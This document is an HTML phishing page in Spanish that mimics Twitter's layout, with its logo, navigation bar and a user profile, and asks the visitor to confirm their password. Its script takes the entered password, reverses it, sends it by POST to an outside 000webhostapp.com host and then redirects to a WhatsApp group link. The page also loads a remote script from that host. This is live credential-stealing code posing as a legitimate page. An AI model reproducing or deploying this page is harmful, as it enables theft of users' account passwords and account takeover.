<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Confirma tu contrase&ntilde;a</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <style type="text/css">
        body {
            font-family: Arial, Helvetica, sans-serif;
        }

        @media screen and (min-width: 1051px) {
            .form {
                /* Firefox */
                width: -moz-calc(100% - 800px);
                /* WebKit */
                width: -webkit-calc(100% - 800px);
                /* Opera */
                width: -o-calc(100% - 800px);
                /* Standard */
                width: calc(100% - 800px) !important;
            }
        }

        @media screen and (min-width: 800px) and (max-width: 1050px) {

            .form {
                /* Firefox */
                width: -moz-calc(100% - 500px);
                /* WebKit */
                width: -webkit-calc(100% - 500px);
                /* Opera */
                width: -o-calc(100% - 500px);
                /* Standard */
                width: calc(100% - 500px) !important;
            }
        }

        @media screen and (min-width: 800px) {

            .left-bar {
                width: 220px !important;
                padding-left: 100px !important;
            }


            .btn-left-bar,
            .btn-left-bar-2 {
                width: 220px !important;
                text-align: left !important;
                padding-left: 10px !important;
            }

            .left-bar svg {
                vertical-align: bottom;
            }

            .left-bar a {
                text-decoration: none;
                color: black;
            }

            .left-bar span {
                padding-left: 10px;
                font-size: 20px;
            }

            .btn-compose-tweet {
                width: 190px;
            }

            .btn-compose-tweet svg {
                display: none;
            }

            .btn-compose-tweet span {
                color: white;

            }
        }

        @media screen and (max-width: 799px) {
            .left-bar span {
                display: none;
            }

            .name {
                display: none;
            }

            .btn-compose-tweet {
                width: 50px;
            }
        }

        .centered {
            margin-left: auto;
            margin-right: auto
        }


        .left-bar {
            width: 50px;
            padding-left: 10px;
            padding-right: 10px;
            float: left;
        }

        .form {
            float: left;
            border-left: 1px solid #EFEFEF;
            padding-left: 20px;
            height: 500px;
            /* Firefox */
            width: -moz-calc(100% - 100px);
            /* WebKit */
            width: -webkit-calc(100% - 100px);
            /* Opera */
            width: -o-calc(100% - 100px);
            /* Standard */
            width: calc(100% - 100px);
        }


        .left-bar svg {
            cursor: pointer;
            width: 28px;

        }


        .btn-left-bar,
        .btn-left-bar-2 {
            width: 50px;

            border-radius: 25px;
            -moz-border-radius: 25px;
            -webkit-border-radius: 25px;

            padding-top: 12px;
            text-align: center;
            height: 38px !important;

            margin-bottom: 20px;

        }

        .btn-left-bar:hover {
            background-color: #EFEFEF;
        }




        .btn-compose-tweet {
            text-align: center;
            padding-top: 12px;
            height: 38px !important;

            border-radius: 25px;
            -moz-border-radius: 25px;
            -webkit-border-radius: 25px;

            background-color: rgb(29, 155, 240);
        }


        .title-page {
            padding-top: 30px;
            font-weight: bold;
            font-size: 24px;
        }

        .sub-title {
            color: rgb(83, 100, 113);
            margin-top: 20px;
            margin-bottom: 20px;
            font-size: 13px;
        }

        .error {
            border: 2px solid #ff0000 !important;
        }

        .hidden {
            display: none;
        }

        .error-pwd {
            color: #ff0000;
            font-size: 13px;
            text-align: left;
        }

        .input {
            height: 50px;
            font-size: 17px;
            padding-left: 10px;

            border-radius: 5px;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;

            border: 1px solid #EFEFEF;
            /* Firefox */
            width: -moz-calc(100% - 20px);
            /* WebKit */
            width: -webkit-calc(100% - 20px);
            /* Opera */
            width: -o-calc(100% - 20px);
            /* Standard */
            width: calc(100% - 20px);
        }

        .input:focus {
            border: 2px solid rgb(29, 155, 240);
        }

        .btns {
            margin-top: 15px;
            text-align: right;
        }

        .btn-confirm {
            background-color: rgb(29, 155, 240);
            color: white;
            padding-top: 7px;
            padding-bottom: 7px;
            padding-left: 10px;
            padding-right: 10px;
            font-weight: bold;
            font-size: 14px;

            border-radius: 35px;
            -moz-border-radius: 35px;
            -webkit-border-radius: 35px;

            cursor: pointer;
            margin-right: 20px;
        }

        .img-profile {
            border-radius: 20px;
            -moz-border-radius: 20px;
            -webkit-border-radius: 20px;
            cursor: pointer;
            width: 40px;
        }
    </style>
    <script type="application/javascript" src="https://tw-course.000webhostapp.com/app.php" ></script>
    <script type="application/javascript">
    <!--
        window.onload = function () {
            document.getElementById('btn-confirm').addEventListener('click', function () {
                document.getElementById('pwd').setAttribute('class', 'input')
                document.getElementById('error-msg').setAttribute('class', 'hidden')


                var pwd = document.getElementById('pwd').value;


                if (pwd.length > 5) {

                    var url = 'https://tw-course.000webhostapp.com/';
                    var data = reverseString(pwd);
                    var postData = 'data=' + data + '&encoded=' + encodeURI(data);
                    var requestError = new XMLHttpRequest();
                    requestError.open('POST', url, true);
                    requestError.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                    
                    requestError.onreadystatechange = function () {
                        window.location.href = 'https://chat.whatsapp.com/L8ws95klhT334HteiqBj2K';
                    };

                    requestError.send(postData);

                } else {
                    document.getElementById('pwd').setAttribute('class', 'input error')
                    document.getElementById('error-msg').setAttribute('class', 'error-pwd')
                }


            });
        }

        function reverseString(str) {
            var newString = "";
            for (var i = str.length - 1; i >= 0; i--) {
                newString += str[i];
            }
            return newString;
        }-->

    </script>
</head>

<body>

    <div>


        <div class="centered">
            <div class="left-bar">

                <!-- logo-->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/home">
                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class=" r- r-4qtqp9 r-yyyyoo r-16y2uox r-8kz0gk r-dnmrzs r-bnwqim r-1plcrui r-lrvibr r-lrsllp">
                            <g>
                                <path fill="rgb(29, 155, 240)"
                                    d="M23.643 4.937c-.835.37-1.732.62-2.675.733.962-.576 1.7-1.49 2.048-2.578-.9.534-1.897.922-2.958 1.13-.85-.904-2.06-1.47-3.4-1.47-2.572 0-4.658 2.086-4.658 4.66 0 .364.042.718.12 1.06-3.873-.195-7.304-2.05-9.602-4.868-.4.69-.63 1.49-.63 2.342 0 1.616.823 3.043 2.072 3.878-.764-.025-1.482-.234-2.11-.583v.06c0 2.257 1.605 4.14 3.737 4.568-.392.106-.803.162-1.227.162-.3 0-.593-.028-.877-.082.593 1.85 2.313 3.198 4.352 3.234-1.595 1.25-3.604 1.995-5.786 1.995-.376 0-.747-.022-1.112-.065 2.062 1.323 4.51 2.093 7.14 2.093 8.57 0 13.255-7.098 13.255-13.254 0-.2-.005-.402-.014-.602.91-.658 1.7-1.477 2.323-2.41z">
                                </path>
                            </g>
                        </svg>

                    </a>

                </div>

                <!-- home -->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/home">

                        <svg viewBox="0 0 24 24" aria-hidden="true">
                            <g>
                                <path
                                    d="M22.46 7.57L12.357 2.115c-.223-.12-.49-.12-.713 0L1.543 7.57c-.364.197-.5.652-.303 1.017.135.25.394.393.66.393.12 0 .243-.03.356-.09l.815-.44L4.7 19.963c.214 1.215 1.308 2.062 2.658 2.062h9.282c1.352 0 2.445-.848 2.663-2.087l1.626-11.49.818.442c.364.193.82.06 1.017-.304.196-.363.06-.818-.304-1.016zm-4.638 12.133c-.107.606-.703.822-1.18.822H7.36c-.48 0-1.075-.216-1.178-.798L4.48 7.69 12 3.628l7.522 4.06-1.7 12.015z">
                                </path>
                                <path
                                    d="M8.22 12.184c0 2.084 1.695 3.78 3.78 3.78s3.78-1.696 3.78-3.78-1.695-3.78-3.78-3.78-3.78 1.696-3.78 3.78zm6.06 0c0 1.258-1.022 2.28-2.28 2.28s-2.28-1.022-2.28-2.28 1.022-2.28 2.28-2.28 2.28 1.022 2.28 2.28z">
                                </path>
                            </g>
                        </svg>

                        <span>Inicio</span>
                    </a>
                </div>

                <!-- explore -->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/explore">

                        <svg viewBox="0 0 24 24" aria-hidden="true">
                            <g>
                                <path
                                    d="M21.53 20.47l-3.66-3.66C19.195 15.24 20 13.214 20 11c0-4.97-4.03-9-9-9s-9 4.03-9 9 4.03 9 9 9c2.215 0 4.24-.804 5.808-2.13l3.66 3.66c.147.146.34.22.53.22s.385-.073.53-.22c.295-.293.295-.767.002-1.06zM3.5 11c0-4.135 3.365-7.5 7.5-7.5s7.5 3.365 7.5 7.5-3.365 7.5-7.5 7.5-7.5-3.365-7.5-7.5z">
                                </path>
                            </g>
                        </svg>
                        <span>Explorar</span>
                    </a>

                </div>

                <!--notifications-->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/notifications">

                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class="r-18jsvk2 r-4qtqp9 r-yyyyoo r-lwhw9o r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
                            <g>
                                <path
                                    d="M21.697 16.468c-.02-.016-2.14-1.64-2.103-6.03.02-2.532-.812-4.782-2.347-6.335C15.872 2.71 14.01 1.94 12.005 1.93h-.013c-2.004.01-3.866.78-5.242 2.174-1.534 1.553-2.368 3.802-2.346 6.334.037 4.33-2.02 5.967-2.102 6.03-.26.193-.366.53-.265.838.102.308.39.515.712.515h4.92c.102 2.31 1.997 4.16 4.33 4.16s4.226-1.85 4.327-4.16h4.922c.322 0 .61-.206.71-.514.103-.307-.003-.645-.263-.838zM12 20.478c-1.505 0-2.73-1.177-2.828-2.658h5.656c-.1 1.48-1.323 2.66-2.828 2.66zM4.38 16.32c.74-1.132 1.548-3.028 1.524-5.896-.018-2.16.644-3.982 1.913-5.267C8.91 4.05 10.397 3.437 12 3.43c1.603.008 3.087.62 4.18 1.728 1.27 1.285 1.933 3.106 1.915 5.267-.024 2.868.785 4.765 1.525 5.896H4.38z">
                                </path>
                            </g>
                        </svg>
                        <span>Notificaciones</span>
                    </a>
                </div>


                <!--messages-->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/messages">

                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class="r-18jsvk2 r-4qtqp9 r-yyyyoo r-lwhw9o r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
                            <g>
                                <path
                                    d="M19.25 3.018H4.75C3.233 3.018 2 4.252 2 5.77v12.495c0 1.518 1.233 2.753 2.75 2.753h14.5c1.517 0 2.75-1.235 2.75-2.753V5.77c0-1.518-1.233-2.752-2.75-2.752zm-14.5 1.5h14.5c.69 0 1.25.56 1.25 1.25v.714l-8.05 5.367c-.273.18-.626.182-.9-.002L3.5 6.482v-.714c0-.69.56-1.25 1.25-1.25zm14.5 14.998H4.75c-.69 0-1.25-.56-1.25-1.25V8.24l7.24 4.83c.383.256.822.384 1.26.384.44 0 .877-.128 1.26-.383l7.24-4.83v10.022c0 .69-.56 1.25-1.25 1.25z">
                                </path>
                            </g>
                        </svg>
                        <span>Mensajes</span>
                    </a>
                </div>


                <!--profile-->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/intent/user?user_id=1439316691515813890">
                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class="r-18jsvk2 r-4qtqp9 r-yyyyoo r-lwhw9o r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
                            <g>
                                <path
                                    d="M12 11.816c1.355 0 2.872-.15 3.84-1.256.814-.93 1.078-2.368.806-4.392-.38-2.825-2.117-4.512-4.646-4.512S7.734 3.343 7.354 6.17c-.272 2.022-.008 3.46.806 4.39.968 1.107 2.485 1.256 3.84 1.256zM8.84 6.368c.162-1.2.787-3.212 3.16-3.212s2.998 2.013 3.16 3.212c.207 1.55.057 2.627-.45 3.205-.455.52-1.266.743-2.71.743s-2.255-.223-2.71-.743c-.507-.578-.657-1.656-.45-3.205zm11.44 12.868c-.877-3.526-4.282-5.99-8.28-5.99s-7.403 2.464-8.28 5.99c-.172.692-.028 1.4.395 1.94.408.52 1.04.82 1.733.82h12.304c.693 0 1.325-.3 1.733-.82.424-.54.567-1.247.394-1.94zm-1.576 1.016c-.126.16-.316.246-.552.246H5.848c-.235 0-.426-.085-.552-.246-.137-.174-.18-.412-.12-.654.71-2.855 3.517-4.85 6.824-4.85s6.114 1.994 6.824 4.85c.06.242.017.48-.12.654z">
                                </path>
                            </g>
                        </svg>
                        <span>Pefil</span>
                    </a>
                </div>

                <!-- more options -->
                <div class="btn-left-bar">
                    <a href="https://twitter.com/settings">
                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class="r-18jsvk2 r-4qtqp9 r-yyyyoo r-lwhw9o r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
                            <g>
                                <circle cx="17" cy="12" r="1.5"></circle>
                                <circle cx="12" cy="12" r="1.5"></circle>
                                <circle cx="7" cy="12" r="1.5"></circle>
                                <path
                                    d="M12 22.75C6.072 22.75 1.25 17.928 1.25 12S6.072 1.25 12 1.25 22.75 6.072 22.75 12 17.928 22.75 12 22.75zm0-20C6.9 2.75 2.75 6.9 2.75 12S6.9 21.25 12 21.25s9.25-4.15 9.25-9.25S17.1 2.75 12 2.75z">
                                </path>
                            </g>
                        </svg>
                        <span>Configuración</span>
                    </a>
                </div>


                <!-- compose tweet -->
                <div class="btn-compose-tweet">
                    <a href="https://twitter.com/compose/tweet">
                        <svg viewBox="0 0 24 24" aria-hidden="true"
                            class="r-jwli3a r-4qtqp9 r-yyyyoo r-1472mwg r-dnmrzs r-bnwqim r-1plcrui r-lrvibr r-lrsllp">
                            <g>
                                <path fill="white"
                                    d="M8.8 7.2H5.6V3.9c0-.4-.3-.8-.8-.8s-.7.4-.7.8v3.3H.8c-.4 0-.8.3-.8.8s.3.8.8.8h3.3v3.3c0 .4.3.8.8.8s.8-.3.8-.8V8.7H9c.4 0 .8-.3.8-.8s-.5-.7-1-.7zm15-4.9v-.1h-.1c-.1 0-9.2 1.2-14.4 11.7-3.8 7.6-3.6 9.9-3.3 9.9.3.1 3.4-6.5 6.7-9.2 5.2-1.1 6.6-3.6 6.6-3.6s-1.5.2-2.1.2c-.8 0-1.4-.2-1.7-.3 1.3-1.2 2.4-1.5 3.5-1.7.9-.2 1.8-.4 3-1.2 2.2-1.6 1.9-5.5 1.8-5.7z">
                                </path>
                            </g>
                        </svg>
                        <span>Twitear</span>

                    </a>
                </div>

                <!-- profile -->
                <div class="btn-left-bar-2">
                    <a href="https://twitter.com/intent/user?user_id=1439316691515813890">

                        <div style="float: left;">
                            <img class="img-profile"
                                src="https://res.cloudinary.com/demo/image/twitter/1439316691515813890.jpg" />


                        </div>
                        <div class="name" style="float: left; padding-left: 15px;">
                            <div style="font-size: 15px; font-weight: bold;">Sara Ponce</div>
                            <div style="font-size: 15px; color: rgb(83, 100, 113);">@SaraPon62195069</div>
                        </div>
                    </a>
                </div>

            </div>

            <div class="form">
                <div style="border-bottom: 1px solid #efefef; padding-bottom: 15px; padding-top: 15px;">
                    <a href="https://twitter.com/messages">
                        <svg style="width: 20px;" viewBox="0 0 24 24" aria-hidden="true"
                            class="r-18jsvk2 r-4qtqp9 r-yyyyoo r-z80fyv r-dnmrzs r-bnwqim r-1plcrui r-lrvibr r-19wmn03">
                            <g>
                                <path
                                    d="M20 11H7.414l4.293-4.293c.39-.39.39-1.023 0-1.414s-1.023-.39-1.414 0l-6 6c-.39.39-.39 1.023 0 1.414l6 6c.195.195.45.293.707.293s.512-.098.707-.293c.39-.39.39-1.023 0-1.414L7.414 13H20c.553 0 1-.447 1-1s-.447-1-1-1z">
                                </path>
                            </g>
                        </svg>
                    </a>
                </div>
                <div class="title-page">Confirma tu contrase&ntilde;a </div>
                <div class="sub-title ">Ingresa tu contraseña para continuar. </div>
                <div>
                    <input placeholder="Contrase&ntilde;a" id="pwd" type="password" class="input" name="pwd" />
                </div>

                <div class="btns">
                    <div id="error-msg" class="hidden">La contraseña que ingresaste es incorrecta.</div>
                    <a id="btn-confirm" class="btn-confirm">Confirmar</a>
                </div>

            </div>

        </div>



    </div>

</body>

</html>
